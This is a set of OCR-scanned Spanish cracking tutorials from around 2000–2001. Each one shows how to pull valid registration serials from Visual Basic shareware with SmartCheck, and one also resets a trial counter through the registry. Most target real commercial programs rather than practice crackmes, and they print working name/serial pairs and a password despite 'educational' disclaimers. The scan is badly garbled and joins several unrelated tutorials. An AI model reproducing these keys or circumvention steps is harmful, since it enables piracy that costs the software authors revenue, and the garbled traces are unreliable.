Pvd: 


[] Do not display this lock again 


coloco en pwd: 2000 y no lo acepta... hmmm... quizás está en el sitio web no lo sé, pero para que ir a buscar si tenemos 
smartcheck en el ordenador :) 


si ya encontraste el código de registro supongo que tienes habilidad para encontrar el password. ..es una búsqueda muy 
simple, supongo que no tengo que explicar como se hace, se los dejo a ustedes. ..pero aquí está todo: 


name: act mago 
key:13k9f9w1h8 
pwd: shareware 


ahora sí, programa crackeado... 


nota: 


soy humano y cometo errores, si encuentras uno házmelo saber ok.actmagoO hotmail.com 


saludos 
saludos a Enticrack!team ( saludos a xasx, no parare : ) ) 
saludos adek_oin. 
saludos y agradecimientosaV | pe T del grupo [k-for] ,por el genial file inspector. 
saludos a toda la people de tutoriales2000. 
saludos aprofesor x. 


saludos al Idea ( monofeo, flaco, chirda, taza, afo, solerman, nasal, peter y a todos los demás) 


saludos a todos los crackers del mundo. 


chao!! 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


actmagoO hotmail.com 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


El Pollo Tutor 


BROSeAnas Crackme de CrkViz v4.0 


PROTECCION: Serial. 

Objetivo: Encontrar el serial. 

Descripcion: Pues eso. 

Dificultad: Facililla 

DOWNLOAD : http://www. geocities.com/crkviz/crack. htm 

Herramientas: file insPEctor v3.5 y SmartCheck 

CRACKER: Act MagO FECHA: 29/11/2000 


introduccion 


hola amigos, presento mi décimocuarto tutorial. ya saben, si tienen alguna duda sólo pregúntenlo actmagoGhotmail.com , como 
siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras cosas. en este tutorial volveremos a usar el 
smartcheck. si no lo tienes instalado puedes bajártelo en www.crackstore.com . asumo que tienes conocimientos básicos sobre su 


uso. y para terminar con la intro debo decir : este texto ha sido escrito sólo con propósitos educacionales. 


este crackme está hecho por mi buen amigo crkviz miembro del grupo [k-for], es la versión número cuatro de sus crackmes y tiene 
una protección serial number y un límite de 8 ejecuciones. 


tenemos a smartcheck... 
pd: si eres un cracker con cierto recorrido te debería tomar un minuto o menos, así que no pierdas tu tiempo leyendo esto. 
al atake 
antes de abrir el programa lo analizamos con file inspector el que nos mostrara los siguientes datos: 
e el programa está desarrollado en microsoft visual basic 5 
e no está empacado 
e msvbvm50.dll 
a continuación... cerramos file inspector v3.5, abrimos el crackme. 


luego abrimos el programa para ver como luce y lo primero que vemos en él en su parte inferior es un mensaje que dice 
"limitado a 8 ejecuciones" y abajo el número de veces que lo hemos utilizado. luego vamos a archivo>registrar y estaremos 
en la caja de registro, la que nos pide los siguientes datos: 


user name: 


serial number: 


mmm, lo primero que haremos será extender el número de ejecuciones a las que nosotros queramos y para eso debemos ir 
a regedit.exe, siguiendo esa ruta: 


mi pcihkey_current_userisoftwarelvb and vba program settingslodbclregister 


en esa clave nos encontraremos con esto... 


A 
¡ab] [Predeterminado] | (valor no establecido) 
(ab] Counter "3: —> número de usos que le hemos 


dado hasta ahora 


yo cambiaré el valor de counter a -50 pero obviamente se le puede asignar el valor que tu quieras. el valor que le he dado 
me dará un uso de 58 ejecuciones, mucho y más que suficiente para chingarlo. 


asumo que tienes bien configurado el smartcheck y que tienes al menos conocimientos básicos sobre su uso. 


a continuación...abrimos smartcheck y vamos directamente a la opción file ---> open y abrimos el ejecutable del programa 
crkmeviz-4.exe, luego presionamos f5 y esperamos a que el programa cargue y cuando lo haga insertamos en caja de 
registro nuestro nombre y nuestro código de registro, y cuando lo hayamos hecho esperamos un momento y le damos click 
a endo al cuadrado rojo. 


el smartcheck recopiló una gran cantidad de información... tenemos una cadena de datos pero la única que nos interesa es 
esta... 


registrar_Click 
richtext_Change 
richtext_Change 
richtext_Change 
richtext_Change 
richtext_Change 
richtext_Change 
richtext_Change 
richtext_Change 
Drag_Click —> está nos 
importa 


OOO 


SY 


OOO 


a El 


J 1 
[hu] 


le damos click a drag_click y vemos esto... 


+82 Drag Click 
$% LCaseARIANT:String""4ct MagO"'] 
$% MidWARIANT:Stina:"act mago", long:1,* 
$% MidWARIANT:Sting:"act mago", long:2, * 
$% MidWVARIANT:Stina:"act mago", long:3,* 
$% MidiVARIANT:String:act mago", long: 4, * 
$% Mid ARIANT:String:"act mago", long:5, * 
$% MidIVARIANT:String:"act mago", lorg:6, * 
$% AscíString:"a"') retums Integer: 97 
$% Asc[String:'c"'] retums Integer: 99 
$% AscíString:"t'"] retums Integer:116 
9% Asc[String:" *") retums Integer:32 
$% Asc[String:"'m"'] retums Integer:109 
$% AscíString:"a'] retums Integer: 97 
Sa tichtext Text 

LeníString:"'5ct MagO"] returns LONG: 


$% Hex[VARIANT:Double:2,72476e+007) 


ahora que está marcada en azul le damos click a este botón L para ver detalladamente el código. 


$% Len(String:"4ct MagO"") retums LONG:8 

$  _ vbaYamMovelARIANT:Long:8, VARIANT:1 
$  _ vbaFreeSti[LPESTR:0063F210) retums Dia 
$  _ vbaFreeObiLPINTERFACE *D0063F200] 
$  — vbaYaDiviARIANT:Double:2,17981e+00: 
$  _ vbaVamMove(váRIA4NT:Double:2,72476e+l 
$% Hex(VARIANT:Double:2,724 007) 


+ : 
$% TextBox:AddRef(LPINTERFACE:029CB840 
$  _ vbaVamMovelYARIANTYT_DISPATCH:02! 
$  — vbaYarElmpEqYARIA4NT:String:""19FC3E9" 
ahí está el código de registro... ahora lo único que debemos hacer es insertar los datos, que en mi caso son: 
user name: act mago 


serial number: 19fc3e9 


le damos click a registrar y... 


Registración EZ 


crckmeviz crackeado... 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagoO hotmail.com 


e saludos a profesor x. ( gran amigo!!) 
e saludos a dek_oin. 
e saludos a crkviz. 


e saludos a code_ mex. 


e saludos a tnticracktteam ( saludos a xasx, no parare : ) ) http://www.tntcrackers. ws 


e saludos a karpoff ( excelente página loco!!) http://welcome.to/karpoff 


e saludos y agradecimientos aV| per del grupo [k-for] , por el genial file inspector. 


e saludos a toda la people de tutoriales2000. 
e saludos al Idea ( monofeo (gran amigo), flaco, chirda, taza, afo, solerman, nasal, peter y a todos los demás) 


e Saludos a todos los crackers del mundo. 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


actmagoO hotmail.com 
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Programa: ShufflePlay 2.63 

PROTECCION: Name / Serial 

Objetivo: Estar registrados. 

Descripcion: Un programita para el manejo de MP3,Cds etc. 

Dificultad: Facililla 

DOWNLOAD: http: //www.pinoyware.com/shuffleplay/index.shtml 

Herramientas: SmartCheck y tu cerebro 

CRACKER: ACaRrR19” FECHA: 10/01/2001 
introduccion 


bueno lo mio no es hacer manuales de cracking pero me he decidido a escribir este para demostrar q' no es 
necesario ser un super-conocedor de ensamblador ni nada de eso para llegar a conseguir el serial de un 
programilla y alimentar nuestro ego personal diciendo:"y lo he hecho y lo he hecho...”... en fin... y tambien 
para agradecer a karpoff un detalle q' tuvo conmigo en su dia.mi verdadero "maestro" es desde hace ya unos 
cuantos años karlitoxz (ahora hace llamarse mrmauve... vaya nombre mas marikita...) , y a el le dedico este . 


nuestro objetivo sera conseguir un serial valido. 


al atake 


desde la pagina del susodicho shuffleplay podemos descargar su ultima revision , bien el zip con toda la tralla de dll's 
de vb o solo el ejecutable.a estas alturas ya tendras las librerias de vb en tu pcera con casi total seguridad osea q' no 
pierdas el time descargando los 3 megas.desempaqueta el zip en un directorio , abre el smartcheck , busca el file 
shuffle2.exe y "leña al mono"dale al play verde y enga enga a correr el programa: 


1.-el primer nag o ventana nos avisa de una mingada de configuracion o no se q' , bueno dile q si q' te gusta el arroz 
con leshe... siguiente ventanucag' no se q' de los mp3, vale dile q' tambien , luego otra los tips de los cohones... vale q| 
tambien... en ese momento tenemos la aplicacion abierta ,si nos fijamos vemos en uno de los menus q' aparece la 
palabra "registration"... dale candela y... o00p 


2.-aki vemos donde meter nuestros datos en tres campos , bien 2/3 ya los tenemos hechos no: name (lo sabemos) 
organization (tb lo sabemos o nos lo inventamos) y registartion key(sejodio...) pues nada a rellenar tios... car19 , mi 
compañia pnk y el serial pues metele todo 111111111111111111111 (a cantidad en principio para registrar este 
proggie da igual pero no asi para muchos otros programas ojo...) y: 


A Sorry. you entered an invalid registrabon code. Please check your entry and ty again. 


3.-bien nos vamos a la ventana del smartcheck buscamos la cadena a la izquierda donde nos avisa de la apertura de una 
ventana en: 
mp 1Imero_timer 

¿2  IntoPlayTimer_Timer 
¿£  Timer5_Timer 

¿2  IntroPlayTimer_Timer 

$  AboutRegistration_Click 
Sa Main.hv'nd 
2 Integer (83) —> Long (83) 
2 Integer (-2) > Long (-2) 
9% SetWindowPos returns BOOL:1 
G* Register (Form) created 


Register_Load 
:S  Register.Show 


4.-abrimos register.show para ver q' operaciones realiza el condenado con nuestros datos y encontramos: 


£  Timerb5_Timer 

B  IntroPlayTimer_Timer 

¿£  Commandl1_Click 
ta Tedl.Texd 
Sa Ted. Tex 
tia Ted3. Ted 
$% Trim$ 
$% Lenretums LONG:5 
$% Trim$ 
$% Lenretums LONG:3 
$% Trim$ 
$% Lenretums LONG:33 


aki si vas picando sobre los trim ves las variaciones q' realiza sobre tus datos y al final oo0000p sorpresa cuatro hexa: 


$% May 
$% Ascretums Integer:?5 


4 || SHUFFLE2.EXEI001906D4 (no debug info) 


$% Hex E string (variant) 
9% Hex Long Val = 49580 OXO000CIAC 
9% Hex 


9% MsgBox 


$ Ascretums meger o 


$% Hex 

- 4 | |SHUFFLE2.EXE!001906F2 (no debug info) 
$% Hex 7 z 
0% Hex E string (variant) 


9% MsgBox Long Wal = 27 0x00000016 


$% Ascretums Integer: 75 
9% Hex 
9% Hex 


9% Hex 


E string (variant) 
9% MsgBox 


Long .'Yal = 24 0x00000018 


9% Ascretums Integer:?5 
9% Hex 
9% Hex 


E string (variant) 
Long Wal = 7? 0x00000007 


9% MsgBox 


bueno bueno q vemos las strings de la derecha nos da la informacion de nuestro serial? muy facil no? pero sera asi? 
veamos clac1b187 ....ummmm metamosla (bonita palabro... q poco se usa...) y el resultado es: 


ya se ya se, como coño averiguar q' justo eso es la cadena o porcion de cadena q' hay q' meter , es praxtica tios solo 
praxtica un poco de intuicion y suerte...en el smartcheck las trims y los finales de cada arbol tras un registering no 
valido tienen en su mayor parte la solucion al tema.... 


bueno espero haber sacado un grito sonrisa alegria o lo q' sea a alguno... 


salud!!!! 
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id dr. salman's windows power tools 
v1.45 


sapos shareware (7 días de prueba). 

descripción: | programa de utilidades para ms windows 95/98. 

objetivo: | obtener serial number (número serie) válido para registrarnos. 
dsescuitad: — [novato, facililla, media, etc. 


programa de utilidades para ms windows 95/98, incluye cinco utilidades (hyperwindows - incrementa la velocidad del 
sistema, hypernet - incrementa la velocidad de descarga en internet, security toolkit - seguridad en el acceso a los 
programas de windows, quick-accelerator - acelera la carga de menus de windows y mejora el modo msdos, ram- 
magnifier - incrementa la ram de 3-20 mb.) de la empresa digital millenium inc. copyright O 1999 dr. salman zafar 


antes de comenzar el atake, hay que tener claro, las herramientas que vamos a emplear, en esta "victima" 
emplearemos en una primera aproximación una herramienta llamada language 2000 beta v4.0.1.140, nos dirá si 


nuestra "victima" esta empaquetada, compilador, etc, ... toda esta información nos ayudara para un atake más rápido. 


pues, nada vamos al aaaaaatttittaaaaaaaakkkkkkkkeeeeee 


arrancamos el language 2000 y cargamos nuestra "victima" y observamos lo siguiente en pantalla: 


$ CMArchivos de programaWDr.Salman's Windows Power 1... Mila E 


pues ya esta, nos dice que el dr. salman's windows power tools v1.45 esta realizado en visual basic 5. 


el siguiente paso será, emplear la herramienta smartcheck un excelente traceador de eventos para visual basic, bien ejecutamos 
el smartcheck (debidamente configurado - existen varios manuales de como configurar el smartcheck, pues ya sabeis a leerlos;)) 
y cargamos nuestra "victima" - y pulsamos el botón [start] o bien, la tecla [£5] esperamos hasta que nos cargue el programa 
"victima". 


una vez, ya cargado observamos un botón llamado, [register power tools], lo pulsamos y nos aparece la típica pantalla con un 
textbox, pidiendonos amablemente que introduzcamos el serial number, en este caso hemos introducido el siguiente 'serial 
dummy : 9876543210" y observaremos los siguientes eventos que se han producido. 


e HyperNet 


curity Tooikit 
QuickA, 


Magnifier 
Buy Now 


y) pa ¿bout Power 


Email Online Help 


% NuMega SmartCheck - [Win_Util_Integral 
File Edit View Program "Window Help 


CO a 


GetFocus[() returns HWND:3920 WIN_UTIL_LINTEGRATOR.EXE!0002067 


Heapálloc[HáNDLE:029E 0000, FL4GS:00000000, DWORD:ODDOD0C 


GetCaretPos[(PTR:0065F640C] returns BOOL:1 ("98765431 0" 

_TextBox::GetProp returms HAESULT:0 
MultiByteT o0w'ideChar(unsigned int: DOOODODO, FLAGS:D00000000, PTR:D: 
SysállocStringLen(PTRA:00000000, Dw*ORD:00000004) returns LPYOID: 
MultiByteT 0w'ideChar(unsigned int: DOOODODO, FLAG S:00000000, PTR:D: 
HeapFree[HANDLE:029E0000, FLAG S:O0000000, PTR:029E9B 24) retur 
ia Textl.Text 
2 _ vbaStiCmpíString:"cheebuch...”, String:""98765432..."] retums DWORD: 
ES  _ vbaFreeSti[LPBSTR:0065F850] 
Fé  SysFreeSting[BSTR:00432390] 

%  — HeapSize[/HANDLE:00430000, FLAG S:00000000, PTR:0043238C] re 

$  —SysFreeString 
—%  _ vbaFreeStrretums DWORD:20 
Fé  _ vbaFree0biLPINTERFACE *“0065F84C] 
9% TextBox:Release[llPINTERFACE:029ED53C] retums DWORD:O 
Té  _ vbaFreeDbj 
Fé vbavaDupivARIANT:String: "Invalid ...”, VARIANT:Empty) 
$  —SysállocStringB yteLeníchar *.004056E8, DWORD:00000024] returns LP=4 
=$ —_ vbaYarDup retums DWODRD:65F82C 
Fé _vbaVaDupivARIANT:String:"Your Reg...”. VARIANT:Empty) v | 
» 


GetCaretPos(PTR:0065F64,0] retums BOOL:1 =)- unsigned short * string] = DD405668 


GetFocus[] retums HW'ND:920 =)- unsigned short * sing? 00 


[Program Events: 21910 


por donde empezamos a tracear? pues, muy fácil, en visual basic la función que compara dos cadenas 'strings' es: 


addr:0f01f8f6 ord: 383 (017fh) name: __vbastremp 


hh 


traceando '__vbastrcmp' con smartcheck 


introducimos en la búsqueda [find] del smartcheck, la función __vbastremp y haber que encontramos. después de varios 
saltos, encontramos la siguiente comparación: 


_ Vbastremp(string:"cheebuch0001346", string:'"9876543210"") returns: dword: ffffffff 

que quiere decir esto?, compara la stringl = "cheebuch0001346" con string2 = "9876543210" (serial que hemos introducido). 
ejecutamos de nuevo nuestra "victima" e introduciremos en el serial number, esta cadena "cheebuch0001346" haber que 
pasa;) 


pues que va a pasar, lo que es de ley “registered version* como nos muestra la pantalla de abajo. 


nota.- después de leer el fichero license.txt, nos comenta el autor "users who are interested in purchasing the software may do 
so for u.s. $49.95 ..." pues ya sabeis, quien le interese el programa a soltar $49,95;)) 


=' Dr.Salman's Windows Power Tools - Integrator Utility 


Thank you for purchasing Windows 
PowerTools.This Copy has been 
registered. 


For Technical Support and Update 


al Y 


Email Online Help 


un saludo! 


+erOser'2000 
for the new millennium 


-=/W- your mind is the power -/WV=- 


om ++ agradecimientos H----- - 
karpoff, demian, black fenix, prOfesor x, numit_or, esiel 2, mr. crimson, mr. white, mr. green, tnt, wkt, kut y a todos los crackers 
del pasado, presente y futuro. 
o Hoc O Han - 
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Programa: Pokémon Trading Cards Game v1.1 

PROTECCION: Serial 

Objetivo: Conseguir un serial valido 

Descripcion: Programa para Jugar por internet al Pokémon TCG 

Dificultad: PrincipianteFacililla 

DOWNLOAD : Http://realhomero.webjump.com 

Herramientas: SmartCheck (Lo encontras en la pagina de Karpoff) 

CRACKER: loko2000 FECHA: 23/01/2001 
INTRODUCCION 


Holas, estoy iniciando en el mundo de los crackers =), este es mi primer tutorial, espero que no el 
ultimo, me resulto muy, muy facil encontrar un serial valido para este programa. Bueno basta de 
charla y empecemos a crackear, jeje. 


AL ATAKE 


Vemos que cuando queremos armar un mazo, nos aparece una molesta pantalla donde nos da un numero de 
producto en mi caso 71110888 y nos da para colocar el serial, coloquemos 12345678 para ver que pasa, nada?, 
hum.., no nos servira de nada usar el W32asm con VB string ref. 


Esto sera facil gracias al SmarCheck, lo abrimos, vamos a File, le damos click a Open... y buscamos el 
ejecutable del programa, esperamos un laaaaargo rato hasta que nos termine de cargar el programa, hum.. 
sigue CargandO.......oooo. , hum....., al fin!!!, termino!!! 


En el SmartCheck hacemos click en View y luego en Show Errors and Especific Events. 


Bueno, es tan facil que lo unico que debemos hacer con el programa ejecutado es hacer un click en Decks y 
luego en Create, en el SmartCheck aparecera la instruccion _Click, desplegamos el _Click, vemos que aparece 
Len returns LONG......, le hacemos click y hum...., al costado vemos que aparece el nombre con el que 
registramos el windows, en mi caso Loko2000, seguimos bajando y vemos (en mi caso): 


EFB2  _Click En ASCII 
43% Len retums LONG:8123876 
2 Long (8) --> Integer (8) 76=L 
Mid 
Asc retums Integer: 76 
Mid 
¿Asc retums Integer:111 
Mid 107 =k 


de 

do 

de 

Le 

de 

% Asc retums Integer:107 

% Mid 111=0 
% Asc retums Integer:111 

9% Mid 50 =2 
% Asc retums Integer: 50 

% Mid 

% Asc retums Integer: 48 182) 
% Mid 

% Asc retums Integer: 48 
% Mid 

% Asc retums Integer: 48 48 =0 
$% Len retums LONG:8123876 


Bajamos abajo de todo del _Click y clickeamos en Len returns LONG....., y al costado..., hum.., nuestro numero 
de producto!, en mi caso 74440888, Seguimos revisando abajo de esta instruccion, hacemos click en Left y 
hum.... ese numero es sospechoso, lo probamos y.. uh!, no era, hacemos click en la instruccion de abajo Format 
y al costado vemos, un numero, parecido al anterior pero mas compacto!, hum.... lo probamos a ver si es el 
serial valido y.... se cerro sin decir nada, como siempre, pero..., volvamos a hacer click en Create y....BINGO!!!, 
NOS DEJA CREAR NUESTROS MAZOS!!!. El programa ya esta registrado. 


Ahora me pondre a hacer un keygen, cuando lo tenga pondre el codigo en VB en alguna otra tutorial que haga, 
si alguien se me adelanta, me manda un mail con el codigo de fuente y lo agregare en alguno de mis proximos 


tutoriales. 


Cualquier duda, queja o consejo sobre o para mis proximos tutoriales, mandame un mail a 


loko02000 Gpkmgym.com.ar. 


Chaus!!! 
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Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 
Recipe Calc 4.0 


Trial de 20 días con Codigo de Registro 
Encontrar el número de registro 
Programa de Conteo de Calorias 
Principiante 


http://www. recipecalc. comy/ 


NuMega SmartCheck v 6.03 
crkvlugo FECHA: 15/04/2001 


INTRODUCCION 


Muy Buenas. Este es mi primer tutorial, Aunque es un programa muy facilon lo escogi para que me vallan conociendo, 


espero que en futuro 


agarre programas mas complicados. El programa que Analizaremos es el Recipe Calc. 4 por Mark Muller, en este tutorial 
veremos como obtener el codigo de 


Registro valido. Bueno ahora a patearle el trasero al programa. esta pantalla la tome donde baje el programa y me dice que el 
programa te dan 45 dias pero lo sierto es que solo te dan 20 dias para probarlo, bueno entremos al programa y nos sale una 
pantalla con alimentos y el canto del aleluya. despues entra al programa. 


AL ATAKE 


Recipe Calculator '98 version 1.3 Trial Edition, 44 days left in trial period 


e, Mozzarella, Part ae 


A 
y 12 | 
1lb Beef, Ground, Extra Lean, Raw 
Cheese, Mozzarella, Part siim milk -. o Callosa 


Hi Cheese, Ricolta, Lite, [Sargento] 
Y pe Ground. Black 


1111 A LO QUE TE TRUJE CHENCHA !!! 


Lo primero es ver que lenguaje de Programacion utilizarón, bueno utilizaremos el Language 2000 v4.5.1.144 para ver 
si esta empaketado o con que lo protegierón. 


E C-MArchivos de programaiRecipe CalciRecipe.exe 
PA "| mmm mas claro que el agua no puede 
estar, echo en Visual Basic 6. sin 


Compresión ni Encryptación. sigamos.. 


Intentemos registrarnos para ver si nos da un mensaje o que carajos da. en la parte superior isquierda del programa ahi 
vemos Registratión le picamos con el cursor en esa parte y nos vamos a Enter Your Registration Code y nos muestra 
esta ventanita. 


£. Registration Form 


Le damos doble click a Finish y nos da un sonido y el programa nos contesta logicamente un error : 


Ahora viendo todo esto tenemos que tomar una desicion de que como lo vamos a atakar, como el programa esta en 
Visual Basic, yo usare el NuMega SmartCheck, Cerramos el programa y Abrimos el Smart y nos vamos a File --> 


Open . y buscamos el programa Recipe Calc done lo tengamos y le damos doble click a este icono > de nuevo se 
abre el programa y procedemos a registrarlo ponemos los datos anteriores en mi caso es crkvlugo 1234567890 y le 
damos doble click en Finish. y el Smart nos da unos buenos datos de lo que esta ocurriendo. logicamente nos manda 


de nuevo el mensajito de Registration Failed pues cerramos la aplicacion con MO asi solo nos quedamos con el smart 
y seguimos trabajandolo esto es una parte que nos muestra.. 


% NuMega SmartCheck - [Recipe.exe - Program Results] ml E 
El File Edit Wiew Program Window Help -(59/xj 


E 8 Thread 0 [thread id:429454331: 4 


[No details) 


+ 
= 
2 
TD 


y 
4 » 


For Help. press Fl | ¡Program Events: 30481 7 


Lo que nos interesa es el ultimo click le damos al signo positivo y nos muestra : 


E Ao: SmartCheck - Mila exe - Bic Results] 


2 | | RECIPE.EXE!0O00413C1 (no debug 
E String stringl = 0052£5B4 
+ ="crkvlugo" 


Len retums LONG:8 


¿Asc retums Integer: 99 
Mid 

¿Asc retums Integer:114 
Mid 

¿Asc retums Integer: 107 
Mid 

¿Asc retums Integer:118 
Long (438) --> String ("438") 
InStr retums LONG:0 
Trirn 

Trim 

MsgBox retums Integer: 1 
B  _Click 


+ 
+ 
4 
+ 
e 
+ 
> 
+ 


+ 
> 


+++ 
Eo le e 


For Help, press Fl [ [Program Events: 30481 Lo 


Ahora analizemos esto en la parte que tengo señalada ahi se ve el user name que use crkvlugo con una longitud de 8 
caracteres, ahora abajo de el vemos un sonido Mid como el que salio cuando nos intentamos registrar si nos fijamos 
vemos que el programa agarra mi primer caracter que es la letra c que su valor asccies (99) y asi con r (114), k 
(107) y v (118) los suma y nos da nuestro dificil numero serial que en mi caso es 438 jejeje eso lo podremos 
comprobar en esta parte del Smart donde hace la comparacion de Serial con el Serial Falso 


E decias SmartCheck - :- [Recipe.es exe - lic Results] 


a | [RECIPE.EXEI0004147D (no debug 
+= Long start =1 Ox00000001 
Leen LNB8 => Sting string = 0474FFSO 
Mid Lo "1234567890" 


Asc retums Integer: 39 E String string2 = DO52E56C 
Mid TT 


¿Asc retums Integer:114 
Mid 

¿Asc retums Integer: 107 
Mid 

¿Asc retums Integer:118 
Long (438) --> String ("438") 
InStr retums LONG:0 
$% Trim 

$% Trim 

$% MsgBox retums Integer:1 
_Click 


:-- Integer compare = 0 0x0000 


y y y LLL PCS... e. 


For Help, press Fl | [Program Events: 30481 7 


Abrimos de nuevo el programa y si estoy bien me lo debe de registrar le damos los datos correctos crkvlugo y 438 y 
nos manda este mensaje.. 


E Copyright, License Agreement, Warranty Agreement, and Distrbution Information [3 


Recipe Calc v4.0, registered version, Copyright 2000-Mark Muller, All 


rights reserved. 


License Agreement 
You are hereby licensed to use this software on one machine or one 
local area network. Unless specifically authorized otherwise. 


Disclaimer of Warranty 
THIS SOFTWARE AND THE ACCOMPANYING FILES ARE SOLD"AS IS" 


| have read and understand the above. | agree to all the terms and conditions. 


Solo nos esta preguntando si aceptamos las condiciones de Copyright.. osea este arroz ya esta listo para servirce a la 
mesa.. 


COMENTARIOS 


Como vimos estubo demaciado facil sacarle el serial y mas facil hacerle el keygen eso se lo dejo a otra persona que 
tenga mas tiempo, el recordatorio de todos. solo usen la Ingenieria Inversa como fines educativos, si les gusta el 
programa ke los compren o en nuestro caso sacale el serial para uso personal. 


SALUDOS 


Bueno, para acabar, quiero mandar saludos a todo el grupo de Tutoriales 2000, y muy en especial a PoPe del canal 
crackers y a mi buen amigo el PrOFeSoR X tambien saludos a : 


+ [DeK_OiN ] 


. ¡TeD 


e Txeli 

e CODE_MEX 
e Metamorfer 
e Txotxo 

e Turbop 


e Xasx de TNT! http://www. tntcrackers. ws 
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Programa: POWER DEFRAG 2.00 PRO 

PROTECCION: Name / Serial. 

Objetivo: Simular estar registrados. 

Descripcion: DESFRAGMENTADOR DE DICO DURO 

Dificultad: Newbie 

DOWNLOAD : http: //www.e-technik.com 

Herramientas: File Inspector, Smartcheck 

CRACKER: Cap_kirk69 FECHA: 6/04/2001 
INTRODUCCION 


HOLA.... HOLA... AQUI ESTAMOS OTRA VEZ CON NUEVO TUTO, DESPUES DE ESTAR UN POCO 
MAREADO CON EL SICE , QUE ME TRAE LOCO, PUES UN POCO DE RESPIRO CON OTRAS 
HERRAMIENTAS NO VIENE MAL ASI QUE ARRANCAMOS. 


AL ATAKE 


BUENO UNA HERRAMIENTA PARA OPTIMIZAR EL DISCO DURO, ESO NUNCA VIENE MAL YA 
SABEMOS LO QUE SON LOS DISCOS DUROS SIEMPRE ESTAN DESFRAGMENTADOS ASI QUE 
TENEMOS HERRAMIENTA PARA ELLO. LO DESCARGAMOS DE LA WEB Y NOS DISPONEMOS A 
INSTALARDO..00occcoccccno: YA ESTA? VALE LO PRIMERO QUE VAMOS HA HACER ES PASARLE EL FILE 
INSPECTOR YA SABEMOS COMO.... ABRIR ARCHIVO Y DESPUES ANALIZAR Y UNA VEZ QUE 
TERMINE NOS VAMOS A LA PESTAÑA DE COMPILADOR Y NOS DICE QUE ESTA HECHO CON EL 
MAREAGATOS DEL VIZUAL BASIC O SEA QUE A POR EL SMARTCHECK. 


ABRIMOS EL SAMRTCHEK Y VEMOS QUE LA BARRA DE HERRAMIENTAS ESTA DE ESTA FORMA 


NO TIENE HABILITADO EL BOTON DEL TRIANGULITO, 
QUE ES EL BOTON QUE HACE QUE CUANDO CARGEMOS EL EJETUTABLE CON EL SMATCHEK LO 
PUEDAS ARRANCAR (EL POWER DEFRAG ), EVIDENTEMENTE, 


CARGAMOS EL ARCHIVO EJECUTABLE: PDefrag:exe Y AHORA VEMOS QUE LA BARRA HA CAMBIADO 


Y ESTA DE ESTA FORMA ¡6 HEY... EL BOTON VERDE AHORA ESTA 
ACTIVADO, BUENO PUES LO PULSAMOS Y AHORA VA A EMPEZAR LA CARGA DEL POWER DEFRAG. 


NORMALMENTE CUANDO VAMOS A TRABAJAR LE HACEMOS UNA COPIA AL EJECUTABLE EN 
CUESTION , YO CUANDO SON PROGRAMAS QUE ESTAN HECHOS CON EL MAREAGATOS ESTE DEL 
VIZUAL NI LAS HAGO , PERO ESO ES CUESTION DE CADA UNO.VEMOS QUE HAY MOGOLLON DE 
ERRORES Y SE CARGA EL PROGRAMA , PUES BUENO VAMOS A INTRODUCIR EL NOMBRE Y EL 
SERIAL: 


6 Register 


To register pou copy of Power Defrag 2.00 and, in so doing, upgrade from 
Power Defrag 2.00 Lite to Power Defrag 2.00 Pro, please type in the 
registration information which has been sent to you via E-mail. 


Take care to type in pour Registered Name exactly as it appears in the E-mail, 
paying attention to capitalization and punctuation. 


Example: John Doe 


Registered Name: [cap kirk63 


| Now, type in your 25 digit Registration Key. Remember to include the dashes 
which appear between the groups of 5 letters and numbers. 


Example: 41414-B2B2B-C3C3C-D4D4D-E5E5E 


Registration Key: (1701 


ESTOS SON MIS DATOS LOS TUYOS PUES...SUPONGO QUE SERAN DIFERENTES 


AQUI VEMOS QUE ESTOS CHICOS NOS DAN HASTA LA FORMA DEL SERIAL , CREO QUE NO 
CONOCEN AÚN EL SMARTCHECK GRAVE ERROR, NOS SALE LA PANTALLA CHICO MALO EL SERIAL 
NO VALE , ESO ES LO QUE QUEREMOS NOSOTROS HACER, QUE EL SMATCHECK REGISTRE TODOS 
LOS PROCESOS DEL PROGRAMA. UNA VEZ QUE HAYA TERMINADO DE CARGAR , VERAS QUE AL 
LADO DEL BOTON VERDE (EL TRIANGULITO ) SE HA ENCENDIDO EL ROJO ( CUADRADITO ) LO 
VES.... PUES LE DAMOS AHI PARA TERMINAR LA EJECUCION DEL PROGRAMA Y AHORA ES CUANDO 
EL SMARTCHECK HA CAPTURADO TODOS LOS PROCESOS DE ESTE PROGRAMA EN CUESTION . 


BIEN NOS VAMOS A VIEW / EXPAND ALL Y ABRIMOS TODO EL ARBOL DE PROCESOS Y VAMOS 
MIRANDO .0coooo cccnnnino cnnnonnos THE HAND OF GOD (ESTO QUE ES.....?22?) ¿¿¿BUENO ...??? Y LLEGAMOS 


W YY ASL ICLAITS MHREUOl. TUS E expression [variant] 
$% Chr 


ae Asc returns Integer:110 5- Stn 
$% Len retums LONG:10 
$% Lenretums LONG:32 


dci E- unsigned short =* .pbstiVal = DOS4EASA 

$% Asc retums Integer:117 E) String = D0520FBO 

es Ch "ERROR RRA E8ROt aseo aseos” 
$% Asc retums Integer:110 Integer dayOfWeek = 1 0x0001 


$% Asc retums Integer:123 Integer date = 1 0x0001 
$% Len retums LONG:32 
2. Long (22) --> String ["22""] 


2 Sting["22") --> Long (22) QUE ES ESTE NUMERO???? 
$*% Mid SERA.........777? 
AQU.L..... 0 ES PRAT 


Y ESTE NUMERITO QUE ES...??? LO CONTAMOS SON 25 DIGITOS MAS ABAJO VEMOS SU 
DISTRIBUCION A VER... A VER... LO INTRODUCIMOS EN SU CAJITA YYYYYYYYYYYYYYY 


l Example: John Doe 
Registered Name: AT 


i 
Registration Complete 


eN 
JL) Power Defrag 2.00 Pro has been registered. Congratulations on your purchasel 


PROGRAMA CRACKEADO 


M IS recuerd OS a Profeso rx HEY PROFE LE SAQUE EL SERIAL CON EL SICE 


Si Iver Sto rm EL QUE ME COMENTASTE TAMBIEN 


y atodos los Crackers del Mundo. 


Este manual es Sólo para uso educacional si te gusta el programa COMPRALO 


